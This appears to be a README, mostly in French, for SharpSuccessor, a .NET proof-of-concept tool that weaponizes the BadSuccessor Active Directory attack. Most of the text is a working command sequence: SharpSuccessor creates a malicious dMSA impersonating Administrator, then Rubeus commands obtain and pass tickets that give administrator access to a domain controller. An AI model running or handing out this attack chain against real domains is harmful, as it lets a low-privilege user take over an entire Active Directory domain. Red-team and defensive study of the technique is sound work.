
SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.
SharpSuccessor est une preuve de concept (POC) .NET pour armer complètement l'attaque BadSuccessor de Yuval Gordon (@YuG0rd) publiée par Akamai. Un utilisateur à faibles privilèges disposant des permissions CreateChild sur n'importe quelle unité d'organisation (OU) du domaine Active Directory et d'un accès en écriture sur un objet cible peut effectuer une prise de contrôle de compte.
Utilisez SharpSuccessor pour ajouter et armer l'objet dMSA, ainsi que pour écrire les attributs appropriés sur le compte cible que vous souhaitez usurper :
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

Demandez un TGT dans le contexte de l'utilisateur actuel, en l'occurrence jdoe :
Rubeus.exe tgtdeleg /nowrap

Utilisez ensuite ce tgt pour usurper le compte dMSA :
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

Vous pouvez maintenant demander un ticket de service avec le contexte Administrateur pour n'importe quel SPN, y compris les contrôleurs de domaine, pour la post-exploitation. Par exemple, je vais montrer les privilèges administrateur pour SMB sur le contrôleur de domaine :
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

Maintenant que le ticket est en mémoire, nous pouvons tester l'accès :

Un immense merci à Jim Sykora et Garrett Foster pour les inspirations et l'aide apportées pour cet outil !